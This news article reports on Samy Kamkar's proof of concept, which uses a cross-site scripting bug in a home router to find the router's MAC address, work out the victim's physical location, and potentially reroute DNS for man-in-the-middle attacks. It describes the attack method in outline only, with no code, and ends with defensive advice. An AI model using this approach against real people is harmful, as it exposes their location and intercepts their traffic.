Remember the infamous 'Samy' worm that spread via MySpace in 2005 and infected some 1 million users within 20 hours? Well, researcher Samy Kamkar, who wrote a worm to make "friends" on MySpace, has re-emerged as an independent security researcher and came up with a hack this year detects where you live based on your home router.
Kamkar earlier this year published a proof-of-concept that identifies a user's geographic location via the victim's home router using a cross-site scripting (XSS) bug he discovered in a Verizon FiOS wireless router. Kamkar was able to obtain the browser's MAC address and then map it to the GPS coordinates via Google Location Services.
"The interesting bit is I'm not piggybacking off of the browser's geolocation feature. I simply reimplemented the feature as a server-side tool," Kamkar says. "This way if I can obtain the user's router's MAC address in any way, regardless of browser, nationality, or age, I can typically determine their location and show up at their place with pizza and beer later that night."
Although his attack is based on an XSS flaw in the Verizon FiOS router, Kamkar says it would work with any other router with a XSS vulnerability. There are a couple of caveats for the attack to work: The victim must be logged into her router and have visited a malicious or infected website loaded with the XSS exploit. The attacker then gleans the victim's router's MAC address via Ajax and maps it to her GPS coordinates via Google Location Services. Kamkar says the XSS could also be used to reroute DNS settings on the victim's end, he says, to divert traffic from the victim to his bank's site, for instance. "I can then divert any host name-based traffic to locations of my choice -- for example, sending DNS requests for 'bankofamerica.com' to my own IP address/Website, which we'll just call 'Bank of Samy,' or simply proxy all traffic, becoming a man-in-the-middle [and] reading their email and chatting in place of them with their significant others," he says.
He says the crux of the problem is that security isn't part of the equation in router software. "It's probably assumed that because the router sits on your local network and isn't accessible from the outside world, it's safer," he says. "However, the fact is we can easily trick a user's Web browser to launch the attack for us."
Kamkar's advice to users: Change default passwords in your home router and don't remain logged into the router administrative interface unless you really need to be.
Have a comment on this story? Please click "Discuss" below. If you'd like to contact Dark Reading's editors directly, send us a message.